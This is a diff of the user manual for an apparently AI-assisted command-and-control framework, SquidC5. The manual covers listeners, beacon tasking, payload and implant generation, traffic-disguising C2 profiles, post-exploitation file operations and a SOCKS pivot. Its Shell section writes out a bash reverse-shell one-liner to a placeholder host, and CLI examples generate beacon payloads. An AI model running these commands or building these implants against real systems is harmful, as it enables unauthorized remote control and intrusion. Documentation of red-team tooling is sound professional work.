+| Model Context Protocol | External tool bridge (MCP panel) | [model-context-protocol](https://grok.com/pedia/model-context-protocol) |
 
-If a Grokpedia slug 404s or is empty (SPA), search from [grok.com/pedia](https://grok.com/pedia) for the term. Industry references also: [MITRE ATT&CK — Command and Control](https://attack.mitre.org/tactics/TA0011/).
+---
+
+## Table of contents
+
+1. [Overview](#overview)
+2. [Security model](#security-model)
+3. [Ops console](#ops-console)
+4. [Ops console layout](#ops-console-layout)
+5. [Connection](#connection)
+6. [Event stream](#event-stream)
+7. [Status overview](#status-overview)
+8. [Identity](#identity)
+9. [Sessions](#sessions)
+10. [Shell](#shell)
+11. [Tasks](#tasks)
+12. [Listeners](#listeners)
+13. [Payloads and implants](#payloads-and-implants)
+14. [C2 profiles (Profiles)](#c2-profiles-profiles)
+15. [Artifacts](#artifacts)
+16. [Post-Ex](#post-ex)
+17. [OAST Collaborator](#oast-collaborator)
+18. [Plugins](#plugins)
+19. [Redirector and certificates](#redirector-and-certificates)
+20. [TLS certificate library](#tls-certificate-library)
+21. [Observability](#observability)
+22. [Timeline and reports](#timeline-and-reports)
+23. [INKO (Intelligent Neural Kinetic Operator)](#inko-intelligent-neural-kinetic-operator)
+24. [LLM connections](#llm-connections)
+25. [Tokens](#tokens)
+26. [Multi-operator collab](#multi-operator-collab)
+27. [Feature toggles](#feature-toggles)
+28. [Policy](#policy)
+29. [MCP tools](#mcp-tools)
+30. [Verified reverse shells](#verified-reverse-shells)
+31. [Signal](#signal)
+32. [CLI reference](#cli-reference)
+33. [Deployment](#deployment)
+34. [Troubleshooting](#troubleshooting)
+35. [Authorized use reminder](#authorized-use-reminder)
 
 ---
 
 ## Overview
 
-### What SquidC5 is
+### What
 
-SquidC5 is a **security-first, AI-native C5** platform — **Command, Control, Cognitive, Collaborative, Coordination** — for **authorized** engagements. In industry language it fills the role of a command-and-control (C2) *team server*: the hub operators use to task implants, receive output, and manage listeners during a red-team or pen-test, with AI assist and multi-operator coordination built in under secure defaults (scoped tokens, audit, AI rails).
+SquidC5 is a **security-first, AI-native C5** platform — **Command, Control, Cognitive, Collaborative, Coordination** — for **authorized** engagements. In industry language it is a command-and-control (C2) *team server*: the hub operators use to task implants, receive output, and manage listeners during a red-team or pen-test, with AI assist and multi-operator coordination under secure defaults.
 
 Operators use:
 
-- **REST API** (scoped tokens)
 - **Ops UI** at `/ops` (browser console)
 - **CLI** `sc5` / `squidc5-cli`
+- **REST API** (scoped tokens; no public OpenAPI on the server)
 
-**Learn more:** [Grokpedia: command-and-control](https://grok.com/pedia/command-and-control) · [red-team](https://grok.com/pedia/red-team)
-
-### Why it is designed this way
+### Why
 
 - **Deny by default** — MCP off, public OpenAPI off, empty CORS, admin UI only after server-side scope check
 - **Deterministic implants** — templates and fixed generators over free-form agent loops
 - **Auditability** — operator, AI, MCP, and feature changes go through policy/audit
 - **Port flexibility** — no hard requirement for 80/443
-- **Dual AI** — external models stay on allow-listed MCP tools; INKO / Admin AI stays capability-gated and sanitizes untrusted input
+- **Dual AI** — external models stay on allow-listed MCP tools; INKO stays capability-gated and sanitizes untrusted input
 
-### High-level architecture
+### How
+
+Engagement lifecycle (mental model):
+
+1. Stand up team server + admin token
+2. Open listeners for the channels you will use
+3. Generate payloads/implants pointed at those listeners (and active C2 profile if HTTP)
+4. Execute only on authorized targets per ROE
+5. Operate via Shell (interactive) or Tasks (beacon queue)
+6. Observe metrics/audit/events; hand off via chat/report
+7. Tear down listeners, revoke tokens, preserve audit as required
+
+### Example
 
 ```text
 Operator (CLI /ops)
     → API (scopes + policy)
-        → Sessions / Tasks / Listeners / Payloads
+        → Sessions / Tasks / Listeners / Payloads / Profiles
         → INKO + Admin AI (sandboxed) / MCP (allow-listed)
         → SQLite data/ (local, never commit)
 Implants / reverse shells → Listeners → Sessions
 ```
 
-### Engagement lifecycle (mental model)
+### See also
 
-1. **Stand up** team server + admin token  
-2. **Open listeners** for the channels you will use  
-3. **Generate payloads/implants** pointed at those listeners (and active C2 profile if HTTP)  
-4. **Execute only on authorized targets** per ROE  
-5. **Operate** via Shell (interactive) or Tasks (beacon queue)  
-6. **Observe** metrics/audit/events; hand off via chat/report  
-7. **Tear down** listeners, revoke tokens, preserve audit as required  
+- [Security model](#security-model)
+- [Vision](squidc5-vision.md)
+- [Operator runbook](operator-runbook.md)
 
 ---
 
@@ -96,8 +141,8 @@ Implants / reverse shells → Listeners → Sessions
 ### What
 
 - **Tokens** `sc5_<urlsafe>` with scopes (`admin`, `sessions:read`, `shell:interact`, …)
-- **Admin UI code** (`console.js`) only after the server validates the token
-- **INKO / Admin AI** sanitizes untrusted input; capabilities are allow-listed
+- **Admin UI code** served only after the server validates an admin-scoped token
+- **INKO / Admin AI** sanitizes untrusted input; capabilities and chat tools are allow-listed
 - **MCP** tools are per-token allow-listed; feature often off by default
 - **Public docs** hard-locked off on the running server
 
@@ -119,7 +164,22 @@ sc5 whoami
 
 ### Transport encryption (TLS)
 
-New instances **generate a unique self-signed certificate** on first start (`data/tls/server.crt` + `server.key`) and serve **ops UI, API, and MCP** over HTTPS. Tokens are encrypted on the wire to the browser/CLI (after you accept the self-signed warning or pin the cert). Override with CA certs via `SQUIDC5_TLS_CERT_FILE` / `SQUIDC5_TLS_KEY_FILE`, or terminate TLS on a redirector. See [deployment.md](deployment.md#tls-https--default-on-new-instances).
+New instances **generate a unique self-signed certificate** on first start (`data/tls/server.crt` + `server.key`) and serve **ops UI, API, and MCP** over HTTPS. Override with CA certs via `SQUIDC5_TLS_CERT_FILE` / `SQUIDC5_TLS_KEY_FILE`, or terminate TLS on a redirector. Manage PEMs in Ops → **Admin** → [TLS certificate library](#tls-certificate-library).
+
+See [Deployment — TLS](deployment.md#tls-https-default-on-new-instances).
+
+### Example
+
+```bash
+curl -sk https://127.0.0.1:8443/api/v1/health
+# {"status":"ok"}
+```
+
+### See also
+
+- [Threat model](threat-model.md)
+- [Tokens](#tokens)
+- [SECURITY.md](../SECURITY.md)
 
 ---
 
@@ -127,7 +187,7 @@ New instances **generate a unique self-signed certificate** on first start (`dat
 
 ### What
 
-Browser UI at `https://HOST:8443/ops` (HTTPS by default). Connection settings stay in **browser localStorage** only. Layout order, wide tiles, and panel open state are also local — **never** persisted to the C2 server.
+Browser UI at `https://HOST:8443/ops` (HTTPS by default). Connection settings stay in **browser localStorage** only. Layout preferences are local — **never** persisted to the C2 server.
 
 ### Why
 
@@ -138,7 +198,7 @@ Operators need a phone-friendly and desktop console without shipping secrets bac
 1. Open `/ops` on the C2 host (same-origin avoids CORS issues).
 2. Paste **API token** → **Save & Connect**.
 3. Connection panel collapses when a token is saved.
-4. Drag **⋮⋮** to reorder cards; **⟷** expands a card to a full row (local only).
+4. Use left nav for workspaces; top-bar **◈ INKO** for chat flyout.
 
 ### Example
 
@@ -147,32 +207,79 @@ https://127.0.0.1:8443/ops
 Token: sc5_… (from data/admin_token.txt)
 ```
 
+### See also
+
+- [Ops console layout](#ops-console-layout)
+- [Connection](#connection)
+
+---
+
+## Ops console layout
+
+### What
+
+The `/ops` console is an **app shell** (multi-page nav + context rail + dock).
+
+| Region | Purpose |
+|--------|---------|
+| **Top bar** | Host, online status, Connect, Refresh, **◈ INKO** flyout |
+| **Left nav** | Dashboard · Sessions · Listeners · Payloads · **Profiles** · **Artifacts** · Post-Ex · Collab · **INKO** · Observe · Admin |
+| **Main** | Active workspace for the selected nav item |
+| **Right rail** | Selected session context (claim, shell, task) |
+| **Bottom dock** | Live event stream + command output (resizable) |
+
+### Why
+
+Discoverability: pick **Sessions** → click a row → use the right rail. Admin-only tools live under **Admin** (server-gated).
+
+### How
+
+1. Connect with a scoped token.
+2. Navigate with left nav (mobile: drawer).
+3. Select a session to open the context rail.
+4. Use bottom dock for events / console output.
+
+### Example
+
+```text
+Sessions → click row → Context rail → Shell "whoami"
+Top bar → ◈ INKO → "list listeners"
+```
+
+### See also
+
+- [Docs index — Ops console map](README.md#ops-console-map)
+- [INKO](#inko-intelligent-neural-kinetic-operator)
+
 ---
 
 ## Connection
 
 ### What
 
-Server URL, API token, and refresh interval for the ops UI.
+Token + base URL used by the Ops UI (localStorage) or CLI (`~/.config/squidc5/config.json`).
 
 ### Why
 
-The UI is a pure client. Without a token, only public shell HTML loads; admin panels load only after `/api/v1/ops/console.js` accepts the token.
+Least surprise: same token model for browser and CLI; secrets stay off the git tree.
 
 ### How
 
-| Field | Meaning |
-|-------|---------|
-| Server URL | Base URL, e.g. `https://159.x.x.x:8443` |
-| API token | `sc5_…` Bearer token |
-| Refresh | Poll interval for sessions/metrics/events |
+- **UI:** Connect panel → URL + token → Save & Connect.
+- **CLI:** `sc5 login --url https://HOST:8443 --token sc5_... [--insecure]`
+- **Env overrides:** `SQUIDC5_URL` / `SC5_URL`, `SQUIDC5_TOKEN` / `SC5_TOKEN`
 
-### Example (CLI equivalent)
+### Example
 
 ```bash
-sc5 login --url https://HOST:8443 --insecure --token sc5_...
-sc5 config
+sc5 login --url https://127.0.0.1:8443 --token "$(cat data/admin_token.txt)" --insecure
+sc5 config --show-token   # local only
 ```
+
+### See also
+
+- [Identity](#identity)
+- [CLI reference](#cli-reference)
 
 ---
 
@@ -180,24 +287,30 @@ sc5 config
 
 ### What
 
-Live feed of recent server events (shell connect/verify/reject, listeners, tasks, etc.), newest first.
+Live feed of recent server events (shell connect/verify/reject, listeners, tasks), newest first. Bottom dock in Ops; CLI `sc5 events`.
 
 ### Why
 
-Operators watch check-ins without opening full audit or metrics dumps.
+Operators need immediate feedback when a shell lands or a listener fails to bind.
 
 ### How
 
-Populated from `GET /api/v1/metrics` → `recent_events`. Refreshes with the Connection poll interval.
+- **UI:** Bottom dock auto-polls / streams events.
+- **CLI:** `sc5 events`
 
 ### Example events
 
-| Type | Meaning |
-|------|---------|
+| Event | Meaning |
+|-------|---------|
 | `shell.connected` | Inbound reverse shell TCP accepted |
 | `shell.verified` | Exec probe passed |
-| `session.rejected` / `shell.false_positive` | Noise/scanner dropped |
+| `shell.false_positive` / `session.rejected` | Noise dropped |
 | `listener.started` | Listener bound and running |
+
+### See also
+
+- [Observability](#observability)
+- [Shell](#shell)
 
 ---
 
@@ -209,11 +322,22 @@ Dashboard tiles: verified shells, listeners up, active sessions, open tasks, HTT
 
 ### Why
 
-One glance at engagement health before diving into panels.
+At-a-glance health without opening every panel.
 
 ### How
 
-Aggregates `/api/v1/sessions`, `/api/v1/listeners`, `/api/v1/tasks`, and metrics counters. Height always fits content (not a fixed scroll tile).
+Open **Dashboard** after connect. Aggregates sessions, listeners, tasks, and metrics counters.
+
+### Example
+
+```text
+Ops → Dashboard → tiles update on soft refresh
+```
+
+### See also
+
+- [Signal](#signal)
+- [Observability](#observability)
 
 ---
 
@@ -221,69 +345,29 @@ Aggregates `/api/v1/sessions`, `/api/v1/listeners`, `/api/v1/tasks`, and metrics
 
 ### What
 
-Who the current token is: actor name, type, token id prefix, and **scopes**.
+Who the token is (`sc5 whoami` / Ops identity strip): name, scopes, actor rename.
 
 ### Why
 
-Scopes gate every panel and API route. Mis-scoped tokens look “broken” until you inspect identity.
+Confirm least privilege before operating; rename actors for multi-op audit clarity.
 
 ### How
-
-- UI: **Whoami** → `GET /api/v1/meta`
-- **Health** → `GET /api/v1/health` (no secrets)
-
-### Example
 
 ```bash
 sc5 whoami
-# scopes: admin, sessions:read, shell:interact, ...
+# API: PUT /api/v1/me  { "name": "alice" }
 ```
-
----
-
-## Shell
-
-### What
-
-Interactive command runner for **verified reverse shells** only.
-
-A **reverse shell** is a pattern where the *target* initiates a connection *outbound* to your listener, then presents a remote command line. That is the opposite of a bind shell (target listens). Outbound connections often pass egress firewalls more easily during authorized tests.
-
-**Learn more:** [Grokpedia: reverse-shell](https://grok.com/pedia/reverse-shell)
-
-### Why
-
-Unverified or echo-only sockets are dangerous noise (Internet scanners, TLS ClientHellos, HTTP probes on common ports). SquidC5:
-
-1. **Classifies** inbound bytes (drops obvious non-shells)
-2. **Exec-probes** the channel (must run a real command)
-3. Marks sessions **verified** only if the probe succeeds  
-
-Only then does the Shell panel accept operator commands.
-
-### How
-
-1. Start a `reverse_shell` listener and get a verified session.
-2. Select session → enter command → **Run**.
-3. **All verified** broadcasts to every verified shell.
-4. **Buffer** reads captured session output (`GET /api/v1/sessions/{id}/output`).
-
-Not a full interactive PTY multiplexer: commands are sent, output is collected with wait/idle windows. Prefer short commands; long interactive programs may not behave like a local terminal.
 
 ### Example
 
-```bash
-sc5 listeners create rev 4444 --kind reverse_shell
-sc5 listeners start <id>
-# target (authorized): bash -i >& /dev/tcp/HOST/4444 0>&1
-sc5 sessions list --shells
-sc5 shell <session_id> "whoami"
-sc5 shell all "id"
+```text
+scopes: admin, sessions:read, shell:interact, …
 ```
 
-### Why stage-2 stabilize
+### See also
 
-Raw reverse shells die on network blips and often lack a clean line protocol. Auto-stabilize injects a reconnecting agent (Linux Python / Windows PowerShell) that re-checks in to `SQUIDC5_PUBLIC_HOST:<port>` and supports reliable command execution. Stage-2 reconnects skip re-staging (banner skip).
+- [Tokens](#tokens)
+- [Multi-operator collab](#multi-operator-collab)
 
 ---
 
@@ -295,37 +379,94 @@ All tracked implant/shell connections (beacons, reverse shells, closed). A **ses
 
 ### Why
 
-Sessions unify:
-
-- Interactive reverse shells  
-- Beacon implants (HTTP/DNS/WS)  
-- Lifecycle (active / closed / rejected)  
-
-Reaping drops zombies so operators are not fooled by “live but mute” entries.
+- Interactive reverse shells need claim + verified channel
+- Beacons need task queue association
+- Closed/dead sessions should not clutter the default list
 
 ### How
 
-| Action | Behavior |
-|--------|----------|
-| List all | Full session table |
-| Reap dead | Probe and close dead/mute shells |
-| Close selected | Closes shell chosen in Shell panel |
+1. **Ops → Sessions** (or `sc5 sessions list`).
+2. Click a row → context rail (claim, shell, task).
+3. Prefer `verified: true` before interactive shell.
+4. Close or reap dead sessions when done.
 
 ### Example
 
 ```bash
 sc5 sessions list
-sc5 sessions list --shells --include-dead
-sc5 sessions reap
+sc5 sessions list --shells
+sc5 sessions get <id>
 sc5 sessions close <id>
+sc5 sessions reap
 ```
 
 ### Session kinds (operator view)
 
-| Kind | Interaction model |
-|------|-------------------|
-| `reverse_shell` / `tcp` | Prefer **Shell** panel after `verified: true` |
-| `beacon` (HTTP/DNS/WS) | Prefer **Tasks** queue; poll for results |
+| Kind | Prefer |
+|------|--------|
+| `reverse_shell` / `tcp` | **Shell** after `verified: true` |
+| `beacon` (HTTP/DNS/WS) | **Tasks** queue; poll for results |
+
+### Pitfalls
+
+| Mistake | Result |
+|---------|--------|
+| Shell on unverified session | Mute / probe failure |
+| Task on reverse_shell only | Use Shell for interactive |
+| Ignore reaped sessions | Target may have dropped |
+
+### See also
+
+- [Shell](#shell)
+- [Tasks](#tasks)
+- [Verified reverse shells](#verified-reverse-shells)
+
+---
+
+## Shell
+
+### What
+
+Interactive command runner for **verified reverse shells** only.
+
+A **reverse shell** is a pattern where the *target* initiates a connection *outbound* to your listener, then presents a remote command line.
+
+### Why
+
+Outbound connections often pass egress firewalls more easily during authorized tests. Stage-2 stabilize keeps the channel reliable after capture.
+
+### How
+
+1. Start a `reverse_shell` listener and get a verified session.
+2. **Ops → Sessions** → select → Context rail → run command, or CLI `sc5 shell`.
+3. Claim the session in multi-op environments before long interactive work.
+
+### Example
+
+```bash
+sc5 listeners create rev 4444 --kind reverse_shell
+sc5 listeners start <id>
+# authorized target: bash -i >& /dev/tcp/HOST/4444 0>&1
+sc5 sessions list --shells
+sc5 shell <session_id> "whoami"
+```
+
+### Why stage-2 stabilize
+
+Raw reverse shells die on network blips and often lack a clean line protocol. Auto-stabilize injects a reconnecting agent (Linux Python / Windows PowerShell) that re-checks in to `SQUIDC5_PUBLIC_HOST:<port>` and supports reliable command execution. Stage-2 reconnects skip re-staging. Exec probe must pass or the session is dropped.
+
+### Pitfalls
+
+| Mistake | Result |
+|---------|--------|
+| Listener not `running` | No connect |
+| Port not open / Docker bridge unpublished | Silent fail |
+| Using Shell on pure beacon | No interactive channel — use Tasks |
+
+### See also
+
+- [Listeners](#listeners)
+- [Runbook — Reverse shell](operator-runbook.md#reverse-shell)
 
 ---
 
@@ -333,39 +474,37 @@ sc5 sessions close <id>
 
 ### What
 
-Async command queue for **beacon** implants (not interactive reverse shells).
-
-A **beacon** is an implant that periodically *checks in* to C2, asks for work, and returns results—classic low-and-slow C2 rather than a permanent interactive shell.
-
-**Learn more:** [Grokpedia: beacon](https://grok.com/pedia/beacon) · [implant](https://grok.com/pedia/implant)
+Async command queue for **beacon** implants (not interactive reverse shells). A **beacon** periodically checks in, asks for work, and returns results.
 
 ### Why
 
-Beacons sleep between check-ins (interval + optional jitter via profiles). Tasks wait until the next poll, then return results—suitable for intermittent connectivity and reduced network chatter during authorized ops.
+Beacons sleep between check-ins (interval + optional jitter via profiles). Tasks wait until the next poll — suitable for intermittent connectivity and reduced chatter.
 
 ### How
 
-1. Get beacon `session_id` from sessions list.
+1. Get beacon `session_id` from Sessions.
 2. Create task with command.
-3. Poll task status until complete (`pending` → `running`/`complete`).
+3. Wait for next check-in; poll task status/result.
 
 Do **not** use Shell for pure beacons; use Tasks.
 
 ### Example
 
 ```bash
-sc5 tasks create <beacon_session_id> "id"
+sc5 tasks create <session_id> "id"
+sc5 tasks list --session <session_id>
 sc5 tasks get <task_id>
-sc5 tasks list --session <beacon_session_id>
 ```
 
 ### Lifecycle detail
 
-```text
-Operator creates task → stored in DB
-Beacon check-in → claims task → runs command on target
-Beacon posts result → task complete → operator reads output
-```
+`pending` → picked up by beacon → `running` / `completed` (or cancelled). HITL may gate high-risk commands per policy.
+
+### See also
+
+- [Sessions](#sessions)
+- [C2 profiles (Profiles)](#c2-profiles-profiles)
+- [Payloads and implants](#payloads-and-implants)
 
 ---
 
@@ -373,51 +512,52 @@ Beacon posts result → task complete → operator reads output
 
 ### What
 
-Server-side acceptors for implant traffic—the sockets (or protocol handlers) bound on the team server (or host network) that wait for targets to connect or query.
+Inbound channels the teamserver binds: `http`, `https`, `tcp`, `reverse_shell`, `dns`, `smtp`.
 
 ### Why
 
-Different channels need different handlers:
+- **reverse_shell** — interactive capture
+- **http / https** — beacon check-in (https for TLS implant HTTP)
+- **dns / smtp** — beacon and/or [OAST](#oast-collaborator) callbacks
 
-| Kind | Use | Industry context |
-|------|-----|------------------|
-| `reverse_shell` | bash `/dev/tcp`, python reverse shells | Classic reverse shell |
-| `http` | HTTP beacon check-ins | Web-looking C2 |
-| `tcp` | Generic TCP channel | Raw framing |
-| `dns` | DNS TXT C2 (set zone) | Covert DNS channel |
+### How
 
-**Learn more:** [Grokpedia: reverse-shell](https://grok.com/pedia/reverse-shell) · [dns-tunneling](https://grok.com/pedia/dns-tunneling) · [websocket](https://grok.com/pedia/websocket)
-
-### How to set up
-
-1. **Create** name + port + kind (+ DNS zone if `dns`).
-2. **Start** until status is `running`.
-3. Open host firewall for that port (and UDP for DNS if applicable).
-4. Point payloads/shells at `HOST:port` (or DNS zone for DNS beacons).
-5. Confirm with Event stream / sessions list.
+1. **Ops → Listeners** (or CLI) → create name, kind, host, port.
+2. **Start** the listener; confirm `running`.
+3. Generate payloads pointed at that host/port.
+4. For DNS, set **zone**. For OAST modes, see [Deployment — OAST](deployment.md#oast-collaborator-dns-http-smtp).
 
 ### Privileged ports
 
-Non-root process: ports &lt; 1024 need host sysctl  
-`net.ipv4.ip_unprivileged_port_start=0`.
+Ports &lt; 1024 need host sysctl when the process is non-root:
+
+```bash
+sysctl -w net.ipv4.ip_unprivileged_port_start=0
+```
+
+See [Deployment — Privileged ports](deployment.md#privileged-ports).
 
 ### Example
 
 ```bash
-sc5 listeners create rev 443 --kind reverse_shell --host 0.0.0.0
+sc5 listeners create rev443 443 --kind reverse_shell
 sc5 listeners start <id>
 sc5 listeners list
 ```
-
-Docker **host** networking binds real host ports. Bridge mode requires publishing every listener port.
 
 ### Common failure modes
 
 | Symptom | Check |
 |---------|--------|
-| Listener created but not `running` | Start failed—port in use, privilege, bind host |
-| Target cannot connect | Firewall, NAT, wrong public host, wrong port |
-| Flood of rejections | Scanners hitting the port—expected; false-shell filter works |
+| Create fails port in use | Another listener or host process |
+| Start fails privilege | sysctl for low ports |
+| Flood of rejections | Scanners — false-shell filter working |
+
+### See also
+
+- [Shell](#shell)
+- [OAST Collaborator](#oast-collaborator)
+- [Runbook — Reverse shell](operator-runbook.md#reverse-shell)
 
 ---
 
@@ -425,26 +565,26 @@ Docker **host** networking binds real host ports. Bridge mode requires publishin
 
 ### What
 
-**Payloads** are the generated scripts/binaries you deliver to an authorized target. **Implants** are the resident agents those payloads become once running—beacons, memory-resident helpers, stagers, etc.
+**Payloads** are generated scripts/binaries you deliver to an authorized target. **Implants** are the resident agents those payloads become. Generators are **deterministic templates**: same inputs → reviewable output.
 
-In SquidC5, generators are **deterministic templates**: same inputs → reviewable output you can diff and archive for the engagement file.
-
-**Learn more:** [Grokpedia: payload](https://grok.com/pedia/payload) · [implant](https://grok.com/pedia/implant) · [beacon](https://grok.com/pedia/beacon)
+**UI:** Ops → **Payloads** (templates, profile select, custom template register, save artifact).
 
 ### Why
 
-- **Auditability** — know exactly what you executed  
-- **Reproducibility** — regenerate for a new host/port without mystery tooling  
-- **Channel match** — reverse-shell templates need reverse-shell listeners; HTTP beacons need HTTP (+ profile shape)  
-- **OpSec** — pair with [C2 profiles](#c2-profiles) so HTTP traffic is not a default fingerprint  
+- **Auditability** — know exactly what you executed
+- **Reproducibility** — regenerate for a new host/port
+- **Channel match** — reverse-shell templates need reverse-shell listeners; HTTP beacons need HTTP + profile shape
+- **OpSec** — pair with [C2 profiles](#c2-profiles-profiles)
 
 ### How
 
-1. Choose **template** or **implant family**.
-2. Set callback **host** and **port** (scheme/zone if needed).
-3. Prefer activating a **C2 profile** first for HTTP surface shape.
-4. **Generate** → review output → stage via approved delivery (never outside ROE).
-5. Confirm check-in on Event stream / Sessions.
+1. Prefer activating a **C2 profile** first for HTTP surface shape ([Profiles](#c2-profiles-profiles)).
+2. Choose **template** (builtin or custom).
+3. Set callback **host** and **port** (scheme/zone if needed).
+4. **Generate** → review → optional **Save artifact**.
+5. Stage via approved delivery (ROE only). Confirm check-in on Events / Sessions.
+
+Custom templates: register with placeholders `{host}` `{port}` `{path}` `{interval}` (Ops Payloads or INKO `register_payload_template`).
 
 ### Stager vs full implant (concept)
 
@@ -452,33 +592,198 @@ In SquidC5, generators are **deterministic templates**: same inputs → reviewab
 |-------|-----------------|
 | Stager / template | Small first stage (`reverse_shell_*`, simple beacons) |
 | Stage-2 stabilize | Server-injected reconnect agent on captured shells |
-| Implant family | Higher-level generators (`http_beacon`, `dns_beacon`, `linux_memfd`, `bof`, …) |
+| Implant family | Higher-level generators + native `sc5beacon` |
 
-### Example templates
+### Example
 
 | Template | Listener |
 |----------|----------|
 | `reverse_shell_bash` / `reverse_shell_python` | `reverse_shell` |
-| `http_beacon_python` / `http_beacon_bash` | `http` (often on API port) |
+| `http_beacon_python` / `http_beacon_bash` | `http` / `https` |
 | `dns_beacon_python` | `dns` + zone |
 | `ws_beacon_python` | WebSocket routes |
-| `memory_beacon_python` / `linux_memfd` | Evasion-oriented Linux paths |
-| `windows_ps_beacon` | Windows PowerShell beacon |
-| `bof_c` | BOF-style C skeleton (advanced) |
 
 ```bash
 sc5 payloads templates
 sc5 payloads generate reverse_shell_bash 203.0.113.10 4444 --raw
 sc5 payloads generate http_beacon_python 203.0.113.10 8443 --raw
+sc5 implants build --os linux --arch amd64 C2_HOST 8443
 ```
 
 ### Safety checklist
 
-- [ ] Written authorization / ROE covers the target  
-- [ ] Callback host/port are *your* infrastructure  
-- [ ] Listener is `running` before execution  
-- [ ] Payload archived for the engagement record  
-- [ ] Cleanup plan exists  
+- [ ] Written authorization / ROE covers the target
+- [ ] Callback host/port are *your* infrastructure
+- [ ] Listener is `running` before execution
+- [ ] Payload archived ([Artifacts](#artifacts))
+- [ ] Cleanup plan exists
+
+### See also
+
+- [Artifacts](#artifacts)
+- [C2 profiles (Profiles)](#c2-profiles-profiles)
+- [Native beacon](../agents/sc5beacon/README.md)
+- [Runbook — Implants](operator-runbook.md#implants)
+
+---
+
+## C2 profiles (Profiles)
+
+### What
+
+**Malleable C2 profiles** define the *shape* of implant traffic—especially HTTP(S): URI paths, headers, body wrapping, jitter, and decoy-friendly patterns. The *active* profile is the contract between **generators** and the **server parser**.
+
+**UI:** Ops → **Profiles** (list, activate, create/save, push).
+
+### Why
+
+Default C2 fingerprints are easy to signature. Profiles change URI/header surface, support jitter, and align redirector configs.
+
+### How
+
+1. List profiles → **activate** one (or create/upsert then activate).
+2. Ensure an HTTP/HTTPS listener is up on the payload port.
+3. **Generate payload** matched to that profile (host/port + same paths/framing).
+4. After switching profiles mid-op, **regenerate** implants — old beacons keep old behavior until redeployed.
+5. Optional: **push** active profile to aligned implants when supported.
+
+### Example
+
+```bash
+sc5 profiles list
+sc5 profiles activate prof_amazon_cdn
+sc5 payloads generate http_beacon_python <HOST> 8443 --profile prof_amazon_cdn --raw
+```
+
+```text
+Ops → Profiles → activate → Payloads → Generate (profile selected)
+```
+
+### Pitfalls
+
+| Mistake | Result |
+|---------|--------|
+| Activate profile B, keep beacons built for A | Check-ins fail or never task |
+| Redirector paths ≠ profile paths | 404 / silent drop at edge |
+| Change profile mid-op without regen | Split fleet behavior |
+
+### See also
+
+- [Payloads and implants](#payloads-and-implants)
+- [Redirector and certificates](#redirector-and-certificates)
+- [Runbook — Malleable HTTP profiles](operator-runbook.md#malleable-http-profiles)
+
+---
+
+## Artifacts
+
+### What
+
+Saved operator assets: generated payloads, custom templates, profile snapshots, implant builds, and other blobs INKO or Ops store for reuse.
+
+**UI:** Ops → **Artifacts** (browse, copy, delete).
+
+### Why
+
+Engagement hygiene — archive what you ran; reuse custom templates without retyping; hand off assets between operators without chat paste-bin.
+
+### How
+
+1. Generate a payload with **Save** / `save=true`, or INKO `save_asset`.
+2. Open **Artifacts** to list by kind.
+3. Copy content or delete when no longer needed.
+4. Custom payload templates also appear under Payloads once registered.
+
+### Example
+
+```text
+Ops → Payloads → Generate → Save artifact
+Ops → Artifacts → filter kind=payload → Copy
+```
+
+API: `GET/POST/DELETE /api/v1/assets` (scoped).
+
+### See also
+
+- [Payloads and implants](#payloads-and-implants)
+- [INKO](#inko-intelligent-neural-kinetic-operator)
+
+---
+
+## Post-Ex
+
+### What
+
+Post-exploitation workspace: file ops, SOCKS pivot, modules — driven from the selected session context.
+
+**UI:** Ops → **Post-Ex** (and session context rail actions).
+
+### Why
+
+Keep interactive post-ex next to the session without leaving the console; enforce claim locks and scopes.
+
+### How
+
+1. Select a verified session (Sessions).
+2. Open **Post-Ex** or use context rail.
+3. **Files:** list / read / write / delete (`POST /api/v1/files/op`).
+4. **SOCKS:** start pivot (`POST /api/v1/pivot/socks`) — implant reverse-dial (default) or direct lab mode.
+
+### Example
+
+```bash
+# File list
+curl -sk -H "Authorization: Bearer $TOK" -H "Content-Type: application/json" \
+  -d '{"session_id":"ses_...","op":"list","path":"/tmp"}' \
+  https://C2:8443/api/v1/files/op
+```
+
+### See also
+
+- [Runbook — SOCKS pivot](operator-runbook.md#socks-pivot)
+- [Runbook — File ops](operator-runbook.md#file-ops)
+- [Sessions](#sessions)
+
+---
+
+## OAST Collaborator
+
+### What
+
+Out-of-band interaction capture (Collaborator / Interactsh style) over **DNS**, **HTTP**, and **SMTP** (log-only; never relays).
+
+### Why
+
+Confirm SSRF, blind XSS, and other OOB callbacks during authorized tests without a separate collaborator stack.
+
+### How
+
+1. Deploy DNS/HTTP/(SMTP) listeners and zone per [Deployment — OAST](deployment.md#oast-collaborator-dns-http-smtp).
+2. Mint a token: `sc5 oast token create --note "…"`.
+3. Use returned `dns_name` / `http_url` / `smtp_to` in the test payload.
+4. Poll hits: `sc5 oast hits --token T [--protocol dns|http|smtp]`.
+
+### Example
+
+```bash
+sc5 --insecure oast token create --note "sqli-oob"
+sc5 --insecure oast tokens list
+sc5 --insecure oast hits --token <TOKEN>
+```
+
+### Pitfalls
+
+| Mistake | Result |
+|---------|--------|
+| Zone NS not delegated | No DNS hits |
+| Port 25 blocked by cloud | Use 2525 lab SMTP or skip SMTP |
+| Expecting SMTP relay | SMTP is capture-only |
+
+### See also
+
+- [Deployment — OAST](deployment.md#oast-collaborator-dns-http-smtp)
+- [Runbook — OAST](operator-runbook.md#oast-collaborator-http-dns-smtp)
+- [Listeners](#listeners)
 
 ---
 
@@ -496,13 +801,18 @@ Keep core binary small; add curated capabilities without open-ended remote code 
 
 1. **Catalog** — list available modules.
 2. **Install + enable** by catalog name.
-3. **Installed** — what is loaded.
+3. **Installed** — review what is loaded.
 
 ### Example
 
 ```text
-Ops → Plugins → Catalog → install "lab_recon" → Install + enable
+Ops → Admin / Plugins → Catalog → install → enable
 ```
+
+### See also
+
+- [Feature toggles](#feature-toggles)
+- [modules/bof](../modules/bof/README.md)
 
 ---
 
@@ -510,25 +820,74 @@ Ops → Plugins → Catalog → install "lab_recon" → Install + enable
 
 ### What
 
-OpSec helpers: nginx reverse-proxy snippet and TLS cert plan text.
+OpSec helpers: nginx reverse-proxy snippet and TLS cert plan text for fronting the teamserver.
 
 ### Why
 
-Fronting C2 through a redirector/CDN reduces direct exposure of the team server.
+Fronting C2 through a redirector/CDN reduces direct exposure of the team server IP.
 
 ### How
 
-- Enter `server_name` and beacon URI paths.
-- **Nginx snippet** → copy to redirector host.
-- **Cert plan** → issuance steps (does not auto-issue on the droplet).
+1. Enter `server_name` and beacon URI paths (match [active profile](#c2-profiles-profiles)).
+2. Generate **nginx snippet** → deploy on redirector host.
+3. Use **cert plan** for issuance steps (does not auto-issue on the droplet).
